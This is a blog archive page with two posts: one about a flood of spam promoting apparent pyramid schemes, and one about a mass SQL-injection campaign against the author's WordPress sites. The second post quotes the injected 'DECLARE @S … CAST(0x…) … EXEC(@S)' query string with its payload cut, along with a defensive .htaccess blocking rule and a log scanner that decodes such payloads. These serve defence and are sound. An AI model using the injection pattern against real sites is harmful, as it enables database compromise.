Tag Archive: NC

Massive Spam Hit for Centurion Wealth Circle Pyramid Scheme

Willie R

Centurion Wealth Circle Spam Deluge

Over the weekend, I received over 600 spams from someone called Willie R (with a number appended to the name) to my Gmail account, which I now use for my spam-trapping on an old email address that I use for registrations and the like… See the screenshot of one page above!

Centurion Wealth Circle

On checking out a sample I found that most point back to Centurion Wealth Circle with a small array of other dubious links included. The spams I got had almost identical formats (except for differing ‘from’ addresses). The differences were in a couple of links. These are the two spam types:

Type 1: Includes Link to AutoXten.com

CWC Spam Type 1

Type 2: Includes Link to TextAdBrokers.com

CWC Spam Type 2

The amazing thing taken straight from http://textadbrokers.com/?premier1 is the spelling mistake for their prime selling point!  Under the headline “What is TextAdBrokers?” we see:

TAB was created as the premier Partner for marketing and distribution For the newly created contextual advertising Platform hitcralwer.com

hitcralwer.com (or HitCrawler.com) has already spawned a long chain on Scam.com that starts with a scam warning, then features server outages, lawyer warnings, lawyer debunkings and various personal threats and revelations about the contributors. For me, this is all very entertaining stuff, but the key facts for me are that:

  1. I have been heavily spammed, all links tending to the same source and all pointers pointing to the same destination(s).
  2. TAB’s own blurb can’t even spell correctly!

From that, you’ll gather which side of the honesty fence I think this lot come from…!

Willie R Burke kindly leaves his address in one spam type as “41 Merker Dr, Edison, NJ 08837”.  This ties in with the WHOIS of the source.  However, I don’t see why I should have to follow THEIR suggestion to stop the spam coming from them.  After all, I have over 600! The suggestion is not everywhere, but only on some of the pointers.

Five domains are in nearly every spam (from those that I checked in my deluge).

These are:

  1. http://vd.autoxten.com
    • –  Under their earnings disclaimer, they claim “that AutoXTen is not a get rich quick scheme but is a business” and that “all customers are essentially purchasing advertising”….?
  2. http://www.centurionwealthcircle.com/?register
    •  – considering the deluge I just got, their spam policy takes some beating!  e.g. “Unsolicited commercial email (UCE), while regarded as legal in some jurisdictions, is regarded as spam by most Internet service providers (ISPs), and may not be used to promote CWC”.  Larry Harper, take note!  I am not prepared to wade through 600 email headers just to prove that your spam policy works…  You do it.  Start with the source.  YOU!
    • Pyramid Details

      Their business model is based on buying “tokens”, keeping them as a “portfolio” or something for a bit, and then cashing in 50% of the “investment” at some ill-defined “maturity” point.  Although they claim otherwise, this is classic pyramid scheme technology.  They make clear the exponential growth that potentially exists in their own blurb, and ONLY pyramid schemes promise exponential growth.

  3. http://www.makemoneyonline-free.org/
    • – here I find out that I “have been invited to join ClixSense by robbie1201”.  Oh really!  Thanks for nowt robbie.  It’s a site called “ClikSense, advertising that pays” but the domain name remains the same.  On their user agreement, point 10, Spam Policy, they helpfully remind Robbie and Willie R that “Spamming is a federal crime. Any member caught Spamming will not only have their account terminated immediately and lose any past, present and future earnings, but shall also be held liable for spamming as we shall cooperate with any authorities and investigations that may arise from the spamming incident. ClixSense may fine your account up to $5 per spam email reported from you email address.”    I don’t think they were listening!
  4. http://www.homebasedtelesalesjobs.com/

The registrant of http://infinityleadsystem.com/ is:

E.C.I.
5802 Bob Bullock C1 Unit 328C-195
Laredo, TX 78041-8813
US

However, the server is located in Quebec, Canada!

Why this should be so when so many sites (like mine here) are served from the massive data centres in the US (like Texas, say!) is beyond me. But I find the Canadian connection strangely comforting.

Conclusion

It stinks. From the initial deluge to burrowing through the various “systems”; it stinks. Leave it well alone folks. Any business of note should NOT be resorting to Spam for new business. The scale of this spam deluge emphasises the non-credibility of these charlatans much more than their cheesy website offering ever could.

The fact that most domains were hidden “for privacy” plus the fact that the websites are almost incomprehensible as they struggle to disguise their real motives and modus operandi are just bonuses!

Probable DDOS attack Using SQL Injection on my Websites

Over the last day, my sites have been really slow and twice to my knowledge have tripped out.  I’ve been getting a mysql error message like so when I try to resolve the problem in phpAdmin;

MySQL: ERROR 1040: Too many connections

I tried hosting chat support (as I’m in a hurry) but the connection kept dropping.  During this process Google came to the fore and pushed me down several avenues of investigation.

This was one result, http://rackerhacker.com/2008/06/24/mysql-error-1040-too-many-connections/ from the web, and another from the horse’s mouth http://dev.mysql.com/doc/refman/5.0/en/too-many-connections.html

I then proceeded to check my WordPress plugins but couldn’t because the server wasn’t responding.  When it finally fired back up after quarter of an hour (!), I immediately disabled some OpenID plugins I’ve been playing with on one site and checked my databases were okay.

They were, but during the process I noticed that Wassup was the biggest table – unusually so.  Looking at some of the references in an extended list in the GUI, I noticed that several (random, as far as I could tell), post addresses were extre-e-e-e-e-mely long, terminating in some form of code.  Like so (It’s manually wrapped to fit into my theme);

http://strangelyperfect.tv/68/70s-mixer/?;DECLARE%20@S%20
CHAR(4000);SET%20@S=CAST(0x…%20AS%20CHAR(4000));EXEC(@S);

(addendum: clickable link removed as I’m using this plugin now)

If you copy & paste and try the link it won’t work now (read on for later ;-) ) but the correct link here does;

http://strangelyperfect.tv/68/70s-mixer/

Before my fix, the first link took the user to the correct page and it displayed in the browser address bar with the long link. My suspicions were now being raised because the page displayed okay. This must be all the WordPress updating I’ve done. It was a couple of updates back that the thing had some SQL Injection resistance built in. It appears to fall over gracefully by ignoring duff requests.

So I chucked the “extra” part of the link into Google like so. There are over 6k hits.

These posts got me thinking:

http://www.unsoughtinput.com/index.php/2006/11/09/comment-spam-deluge-did-our-captcha-get-hacked/

http://treyford.wordpress.com/2008/04/30/scary-mass-sql-attack/

http://www.thejoyofcode.com/Stop_trying_to_hack_me.aspx

and a neat fix that I’ve implemented I found here.

http://www.ravenphpscripts.com/postp122652.html (link removed as they’ve gone a bit funny all of a sudden)

What I’ve done is added the suggested code to my .htaccess file, like so:

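# Added, protect from SQL Injection (sourced from) http://www.ravenphpscripts.com/postp122652.html
RewriteEngine On
# Match any query string containing DECLARE, one or more %20, then @; [NC] makes the match case-insensitive
RewriteCond %{QUERY_STRING} ^.+DECLARE(%20)+@ [NC]
# Leave the URL unchanged (-), answer 403 Forbidden [F] and stop processing further rules [L]
RewriteRule ^.* - [F,L]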

This has done the trick.  Anything banging into my site with that in the string, is rejected.  I haven’t implemented a polite screen.  It just gets the standard response from my host as you’d have found with the first of my links above.

It’ll probably need twiddling in future but it’s okay for now.
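To see which requests of this kind reached the site and what each one carried, the following added example (not part of the original post) scans access-log lines for the same `DECLARE ... @` marker and decodes the `CAST(0x…)` hex into readable text. It assumes Apache combined-format logs; the function names and the sample lines are constructed for illustration, and the query string is URL-decoded before matching so the check does not depend on how the space was encoded.

```python
import re
from urllib.parse import unquote, urlsplit

# Combined Log Format: client, identity, user, [time], "METHOD target PROTO", status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')
# Same marker the .htaccess rule keys on, applied after URL-decoding.
DECLARE_RE = re.compile(r"DECLARE\s+@\w+", re.IGNORECASE)
# Hex literal handed to CAST(); the real statement is hidden in here.
CAST_HEX_RE = re.compile(r"CAST\(0x([0-9A-Fa-f]+)\s+AS\s", re.IGNORECASE)


def decode_cast_payload(query):
    """Return the text hidden in CAST(0x... AS ...), or None if absent."""
    m = CAST_HEX_RE.search(query)
    if not m:
        return None
    hex_digits = m.group(1)
    if len(hex_digits) % 2:          # truncated log entry: drop the odd nibble
        hex_digits = hex_digits[:-1]
    return bytes.fromhex(hex_digits).decode("latin-1")


def scan_access_log(lines):
    """Return one finding per request whose decoded query declares a T-SQL variable."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                 # not a request line we understand
        client, _method, target, status = m.groups()
        parts = urlsplit(target)
        query = unquote(parts.query)
        if DECLARE_RE.search(query):
            findings.append({"client": client, "path": parts.path,
                             "status": int(status), "decoded": decode_cast_payload(query)})
    return findings


# Constructed sample lines (documentation IPs; the hex is only "SELECT 1").
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2020:10:00:01 +0000] "GET /68/70s-mixer/ HTTP/1.1" 200 5120',
    '198.51.100.9 - - [01/Jan/2020:10:00:02 +0000] "GET /68/70s-mixer/?;DECLARE%20@S%20CHAR(4000);'
    'SET%20@S=CAST(0x53454C4543542031%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 403 199',
]

if __name__ == "__main__":
    print(scan_access_log(SAMPLE_LOG))
```

A 403 status on a finding shows the rewrite rule rejected the request; a 200 means it reached the application.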

Another similar link was:

http://strangelyperfect.tv/287/finally-a-bit-more-on-the-air-powered-car-from-guy-negre/

?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x…%20AS%20CHAR(4000));EXEC(@S);

which should point to:

http://strangelyperfect.tv/287/finally-a-bit-more-on-the-air-powered-car-from-guy-negre/

This was especially troublesome as the post title was long anyway so it looked in the browser address bar that everything was okay!

© 2007-2017 Strangely Perfect All Rights Reserved -- Copyright notice by me